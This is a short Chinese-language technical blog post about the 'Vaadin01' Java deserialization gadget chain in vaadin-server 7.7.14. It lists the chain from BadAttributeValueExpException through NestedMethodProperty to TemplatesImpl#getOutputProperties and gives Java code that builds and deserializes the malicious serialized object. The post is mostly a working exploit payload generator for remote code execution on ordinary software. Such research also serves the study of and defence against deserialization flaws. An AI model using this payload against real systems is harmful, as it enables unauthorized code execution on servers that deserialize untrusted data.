Vaadin01 反序列化

Vaadin01 反序列化

依赖

<dependency>
    <groupId>com.vaadin</groupId>
    <artifactId>vaadin-server</artifactId>
    <version>7.7.14</version>
</dependency>

Gadget

/*
 * Gadget:
 *   BadAttributeValueExpException#readObject
 *     PropertysetItem#toString
 *       NestedMethodProperty#getValue
 *         Method#invoke
 *           TemplatesImpl#getOutputProperties
 * */

NestedMethodProperty#getValue 方法存在动态方法调用,很容易就能构造出执行 TemplatesImpl#getOutputProperties 方法的链

public class Vaadin01 {

    public static byte[] getSerializeData() throws Exception{
        TemplatesImpl templatesImpl = CreateTemplatesImpl.createTemplatesImpl();
        BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);
        PropertysetItem propertysetItem = new PropertysetItem();
        NestedMethodProperty nestedMethodProperty = new NestedMethodProperty(templatesImpl,"outputProperties");
        propertysetItem.addItemProperty("1",nestedMethodProperty);
        Reflect.reflectSetField(badAttributeValueExpException,"val",propertysetItem);
        byte[] bytes = SerWithUnSer.serialize(badAttributeValueExpException);
        return bytes;
    }
    
    public static void main(String[] args) throws Exception{
        ParseArgs.parseArgs(args);
        byte[] bytes = getSerializeData();
        SerWithUnSer.unSerialize(bytes);
    }
}
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值